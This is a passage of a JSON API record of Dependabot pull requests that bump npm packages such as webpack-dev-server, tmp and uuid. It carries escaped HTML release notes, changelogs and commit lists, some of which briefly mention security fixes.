href=\"https://github.com/uuidjs/uuid/commit/0f1f9c9c9cedbae5a1d363d5406c5dfbabe81404\"\u003e\u003ccode\u003e0f1f9c9\u003c/code\u003e\u003c/a\u003e chore: switch to Biome for parsing and linting (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/932\"\u003e#932\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/e2879e64bf125add903c1eff6e0860542c605013\"\u003e\u003ccode\u003ee2879e6\u003c/code\u003e\u003c/a\u003e chore: use maintained version of npm-run-all (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/930\"\u003e#930\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/ffa31383e8e4e1f0b4e22e504561272041b8738c\"\u003e\u003ccode\u003effa3138\u003c/code\u003e\u003c/a\u003e fix: Use GITHUB_TOKEN for release-please and enable npm provenance (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/925\"\u003e#925\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/0423d49df2dc8efc300c804731d25f4d7e0fccc4\"\u003e\u003ccode\u003e0423d49\u003c/code\u003e\u003c/a\u003e docs: remove obsolete v1 option notes (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/915\"\u003e#915\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/uuidjs/uuid/compare/v13.0.0...v14.0.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for uuid since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `webpack-dev-server` from 5.2.2 to 5.2.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/releases\"\u003ewebpack-dev-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.4\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.3\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/blob/main/CHANGELOG.md\"\u003ewebpack-dev-server's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e...\n\n_Description has been truncated_","html_url":"https://github.com/pdragy/trillium/pull/129","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/pdragy%2Ftrillium/issues/129","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/129/packages"}},{"old_version":"4.15.0","new_version":"5.2.4","update_type":"major","path":null,"pr_created_at":"2026-05-28T00:43:36.000Z","version_change":"4.15.0 → 5.2.4","issue":{"uuid":"4536768561","node_id":"PR_kwDOSGdRl87gC9Dg","number":28,"state":"closed","title":"Bump the npm_and_yarn group across 13 directories with 9 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-05-28T21:28:29.000Z","author_association":null,"state_reason":null,"created_at":"2026-05-28T00:43:36.000Z","updated_at":"2026-05-28T21:28:31.000Z","time_to_close":74693,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"npm_and_yarn","update_count":9,"packages":[{"name":"tmp","old_version":"0.1.0","new_version":"0.2.6","repository_url":"https://github.com/raszi/node-tmp"},{"name":"webpack-dev-server","old_version":"4.15.0","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"},{"name":"@tootallnate/once","old_version":"2.0.0","new_version":"2.0.1","repository_url":"https://github.com/TooTallNate/once"},{"name":"serialize-javascript","old_version":"6.0.1","new_version":"6.0.2","repository_url":"https://github.com/yahoo/serialize-javascript"},{"name":"uuid","old_version":"3.3.2","new_version":"3.4.0","repository_url":"https://github.com/uuidjs/uuid"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 5 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [tmp](https://github.com/raszi/node-tmp) | `0.1.0` | `0.2.6` |\n| [webpack-dev-server](https://github.com/webpack/webpack-dev-server) | `4.15.0` | `5.2.4` |\n| [@tootallnate/once](https://github.com/TooTallNate/once) | `2.0.0` | `2.0.1` |\n| [serialize-javascript](https://github.com/yahoo/serialize-javascript) | `6.0.1` | `6.0.2` |\n| [uuid](https://github.com/uuidjs/uuid) | `3.3.2` | `3.4.0` |\n\nBumps the npm_and_yarn group with 4 updates in the /compiler directory: [@babel/plugin-transform-modules-systemjs](https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs), [@tootallnate/once](https://github.com/TooTallNate/once), [qs](https://github.com/ljharb/qs) and [axios](https://github.com/axios/axios).\nBumps the npm_and_yarn group with 2 updates in the /compiler/apps/playground directory: [axios](https://github.com/axios/axios) and [next](https://github.com/vercel/next.js).\nBumps the npm_and_yarn group with 1 update in the /fixtures/packaging/brunch/dev directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /fixtures/packaging/brunch/prod directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 2 updates in the /fixtures/packaging/webpack-alias/dev directory: [qs](https://github.com/ljharb/qs) and [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 2 updates in the /fixtures/packaging/webpack-alias/prod directory: [qs](https://github.com/ljharb/qs) and [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 2 updates in the /fixtures/packaging/webpack/dev directory: [qs](https://github.com/ljharb/qs) and [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 2 updates in the /fixtures/packaging/webpack/prod directory: [qs](https://github.com/ljharb/qs) and [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /packages/react-devtools-extensions directory: [webpack-dev-server](https://github.com/webpack/webpack-dev-server).\nBumps the npm_and_yarn group with 1 update in the /packages/react-devtools-inline directory: [webpack-dev-server](https://github.com/webpack/webpack-dev-server).\nBumps the npm_and_yarn group with 1 update in the /packages/react-devtools-shell directory: [webpack-dev-server](https://github.com/webpack/webpack-dev-server).\nBumps the npm_and_yarn group with 1 update in the /packages/react-devtools-timeline directory: [webpack-dev-server](https://github.com/webpack/webpack-dev-server).\n\nUpdates `tmp` from 0.1.0 to 0.2.6\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/raszi/node-tmp/blob/master/CHANGELOG.md\"\u003etmp's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.2.2 (2024-02-28)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/raszi/node-tmp/pull/278\"\u003e#278\u003c/a\u003e Closes \u003ca href=\"https://redirect.github.com/raszi/node-tmp/issues/268\"\u003e#268\u003c/a\u003e: Revert \u0026quot;fix \u003ca href=\"https://redirect.github.com/raszi/node-tmp/issues/246\"\u003e#246\u003c/a\u003e: remove any double quotes or single quotes… (\u003ca href=\"https://github.com/mbargiel\"\u003e\u003ccode\u003e@​mbargiel\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:memo: Documentation\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/raszi/node-tmp/pull/279\"\u003e#279\u003c/a\u003e Closes \u003ca href=\"https://redirect.github.com/raszi/node-tmp/issues/266\"\u003e#266\u003c/a\u003e: move paragraph on graceful cleanup to the head of the documentation (\u003ca href=\"https://github.com/silkentrance\"\u003e\u003ccode\u003e@​silkentrance\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 5\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eCarsten Klein (\u003ca href=\"https://github.com/silkentrance\"\u003e\u003ccode\u003e@​silkentrance\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDave Nicolson (\u003ca href=\"https://github.com/dnicolson\"\u003e\u003ccode\u003e@​dnicolson\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eKARASZI István (\u003ca href=\"https://github.com/raszi\"\u003e\u003ccode\u003e@​raszi\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMaxime Bargiel (\u003ca href=\"https://github.com/mbargiel\"\u003e\u003ccode\u003e@​mbargiel\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/robertoaceves\"\u003e\u003ccode\u003e@​robertoaceves\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.2.1 (2020-04-28)\u003c/h2\u003e\n\u003ch4\u003e:rocket: Enhancement\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/raszi/node-tmp/pull/252\"\u003e#252\u003c/a\u003e Closes \u003ca href=\"https://redirect.github.com/raszi/node-tmp/issues/250\"\u003e#250\u003c/a\u003e: introduce tmpdir option for overriding the system tmp dir (\u003ca href=\"https://github.com/silkentrance\"\u003e\u003ccode\u003e@​silkentrance\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:house: Internal\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/raszi/node-tmp/pull/253\"\u003e#253\u003c/a\u003e Closes \u003ca href=\"https://redirect.github.com/raszi/node-tmp/issues/191\"\u003e#191\u003c/a\u003e: generate changelog from pull requests using lerna-changelog (\u003ca href=\"https://github.com/silkentrance\"\u003e\u003ccode\u003e@​silkentrance\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 1\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eCarsten Klein (\u003ca href=\"https://github.com/silkentrance\"\u003e\u003ccode\u003e@​silkentrance\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.2.0 (2020-04-25)\u003c/h2\u003e\n\u003ch4\u003e:rocket: Enhancement\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/raszi/node-tmp/pull/234\"\u003e#234\u003c/a\u003e feat: stabilize tmp for v0.2.0 release (\u003ca href=\"https://github.com/silkentrance\"\u003e\u003ccode\u003e@​silkentrance\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/raszi/node-tmp/pull/231\"\u003e#231\u003c/a\u003e Closes \u003ca href=\"https://redirect.github.com/raszi/node-tmp/issues/230\"\u003e#230\u003c/a\u003e: regression after fix for \u003ca href=\"https://redirect.github.com/raszi/node-tmp/issues/197\"\u003e#197\u003c/a\u003e (\u003ca href=\"https://github.com/silkentrance\"\u003e\u003ccode\u003e@​silkentrance\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/raszi/node-tmp/pull/220\"\u003e#220\u003c/a\u003e Closes \u003ca href=\"https://redirect.github.com/raszi/node-tmp/issues/197\"\u003e#197\u003c/a\u003e: return sync callback when using the sync interface, otherwise return the async callback (\u003ca href=\"https://github.com/silkentrance\"\u003e\u003ccode\u003e@​silkentrance\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/raszi/node-tmp/pull/193\"\u003e#193\u003c/a\u003e Closes \u003ca href=\"https://redirect.github.com/raszi/node-tmp/issues/192\"\u003e#192\u003c/a\u003e: tmp must not exit the process on its own (\u003ca href=\"https://github.com/silkentrance\"\u003e\u003ccode\u003e@​silkentrance\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:memo: Documentation\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/raszi/node-tmp/pull/221\"\u003e#221\u003c/a\u003e Gh 206 document name option (\u003ca href=\"https://github.com/silkentrance\"\u003e\u003ccode\u003e@​silkentrance\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:house: Internal\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/raszi/node-tmp/pull/226\"\u003e#226\u003c/a\u003e Closes \u003ca href=\"https://redirect.github.com/raszi/node-tmp/issues/212\"\u003e#212\u003c/a\u003e: enable direct name option test (\u003ca href=\"https://github.com/silkentrance\"\u003e\u003ccode\u003e@​silkentrance\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/raszi/node-tmp/pull/225\"\u003e#225\u003c/a\u003e Closes \u003ca href=\"https://redirect.github.com/raszi/node-tmp/issues/211\"\u003e#211\u003c/a\u003e: existing tests must clean up after themselves (\u003ca href=\"https://github.com/silkentrance\"\u003e\u003ccode\u003e@​silkentrance\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/raszi/node-tmp/pull/224\"\u003e#224\u003c/a\u003e Closes \u003ca href=\"https://redirect.github.com/raszi/node-tmp/issues/217\"\u003e#217\u003c/a\u003e: name tests must use tmpName (\u003ca href=\"https://github.com/silkentrance\"\u003e\u003ccode\u003e@​silkentrance\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/raszi/node-tmp/pull/223\"\u003e#223\u003c/a\u003e Closes \u003ca href=\"https://redirect.github.com/raszi/node-tmp/issues/214\"\u003e#214\u003c/a\u003e: refactor tests and lib (\u003ca href=\"https://github.com/silkentrance\"\u003e\u003ccode\u003e@​silkentrance\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/raszi/node-tmp/pull/198\"\u003e#198\u003c/a\u003e Update dependencies to latest versions (\u003ca href=\"https://github.com/matsev\"\u003e\u003ccode\u003e@​matsev\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/41f71598d03f104a67e0448a7cb9bd4efcdd5980\"\u003e\u003ccode\u003e41f7159\u003c/code\u003e\u003c/a\u003e Bump up the version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/efa4a06f24374797ae32ab2b6ae39b7a611ae429\"\u003e\u003ccode\u003eefa4a06\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/7ef2728ce0211b8110b2033dfe62eaf030341acf\"\u003e\u003ccode\u003e7ef2728\u003c/code\u003e\u003c/a\u003e Check for relative values\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/3d2fe387f3f91b13830b9182faa02c3231ea8258\"\u003e\u003ccode\u003e3d2fe38\u003c/code\u003e\u003c/a\u003e Bump up the version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/e16282879e5d0554fe824e1ab3df724847e91183\"\u003e\u003ccode\u003ee162828\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/raszi/node-tmp/issues/309\"\u003e#309\u003c/a\u003e from fflorent/fix-tmp-dir-with-dir\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/b847d2f1a42b625c26149f4a2029ed00a1edf90b\"\u003e\u003ccode\u003eb847d2f\u003c/code\u003e\u003c/a\u003e Fix use of tmp.dir() with \u003ccode\u003edir\u003c/code\u003e option\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/08fa3abac32b621506512724b28b56b9c4a95846\"\u003e\u003ccode\u003e08fa3ab\u003c/code\u003e\u003c/a\u003e Update version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/1cf4ec54180a77a2a95dc1941efa1659774c8787\"\u003e\u003ccode\u003e1cf4ec5\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/188b25e529496e37adaf1a1d9dccb40019a08b1b\"\u003e\u003ccode\u003e188b25e\u003c/code\u003e\u003c/a\u003e Fix GHSA-52f5-9888-hmc6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/73b9fe45bbb40157acdfab8126dd0911de91c8fa\"\u003e\u003ccode\u003e73b9fe4\u003c/code\u003e\u003c/a\u003e Add test case for GHSA-52f5-9888-hmc6\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/raszi/node-tmp/compare/v0.1.0...v0.2.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `webpack-dev-server` from 4.15.0 to 5.2.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/releases\"\u003ewebpack-dev-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.4\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.3\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.2\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.0...v6.0.0\"\u003e5.2.1\u003c/a\u003e (2025-03-26)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ecross-origin requests are not allowed unless allowed by \u003ccode\u003eAccess-Control-Allow-Origin\u003c/code\u003e header\u003c/li\u003e\n\u003cli\u003erequests with an IP addresses in the \u003ccode\u003eOrigin\u003c/code\u003e header are not allowed to connect to WebSocket server unless configured by \u003ccode\u003eallowedHosts\u003c/code\u003e or it different from the \u003ccode\u003eHost\u003c/code\u003e header\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eprevent overlay for errors caught by React error boundaries (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5431\"\u003e#5431\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/8c1abc903ab444d9ce99e567b9a6c603e1ec06be\"\u003e8c1abc9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etake the first network found instead of the last one, this restores the same behavior as 5.0.4 (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5411\"\u003e#5411\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ffd0b86b790d372f90e17aea92cfd9def83fee96\"\u003effd0b86\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.0\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.1.0...v5.2.0\"\u003e5.2.0\u003c/a\u003e (2024-12-11)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/blob/main/CHANGELOG.md\"\u003ewebpack-dev-server's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e 